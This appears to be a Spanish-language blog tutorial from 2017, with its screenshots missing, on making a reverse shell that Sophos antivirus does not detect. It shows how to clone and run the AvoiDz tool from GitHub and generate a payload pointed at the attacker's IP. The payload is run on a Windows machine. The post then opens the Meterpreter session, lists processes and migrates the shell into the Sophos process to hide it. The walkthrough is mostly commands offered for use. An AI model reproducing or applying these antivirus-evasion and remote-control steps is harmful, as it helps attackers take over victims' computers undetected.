domingo, 16 de julio de 2017

Reverse Shell Indetectable por Sophos con AvoiDz

En la versión de Kali que fue probado:



El windows que fue "Atacado" es: 



Descargamos el AvoiDz de gitHub:

cd Desktop/
git clone https://github.com/M4sc3r4n0/avoidz.git
cd avoidz
chmod +x setup.sh
./setup.sh



Verifica las dependencias, las que no tenga las instala:




Ejecutamos sin parametros para ver las opciones:

./avoidz.rb




Ejecutamos lo siguiente especificando la ip en el valor -h esperamos que genere el payload y al final le damos si con la opción Y como muestra la imagen. Tener en cuenta que esto sí o si hay que ejecutarlo desde el entorno gráfico, ya que si lo ejecutamos por ssh no funcionará.

./avoidz.rb -h 'ifconfig eth0 | grep inet | awk {'print $2'}' -f py



Se abre automáticamente la siguiente ventana al darle Y en la pantalla anterior:



El py.exe generado lo copiamos al windows mediante winSCP ó cualquier otro programa para pasar archivos de linux a linux.



Vemos que al ejecutar el py.exe en el windows no lo detecta como virus el antivirus. En el kali vemos que abre la conexión, vemos en la siguiente imagen, ejecutamos los siguientes comandos para ver las sesiones y conectarnos:

sessions
session 1



Ejecutamos sysinfo desde el meterpreter y vemos que estamos conectado al windows:

sysinfo



Vemos los procesos corriendo en el windows:

ps



Vemos el pid del Sophos en la primer columna 5824:



Para migrar el proceso del shell reverso que vemos como PowerShell lo migraremos al PID del sophos:

migrate 5824



También vemos de escanearlo con el antivirus:



No detecta ningún virus:



La versión es la del 2017 actualizada al día de hoy: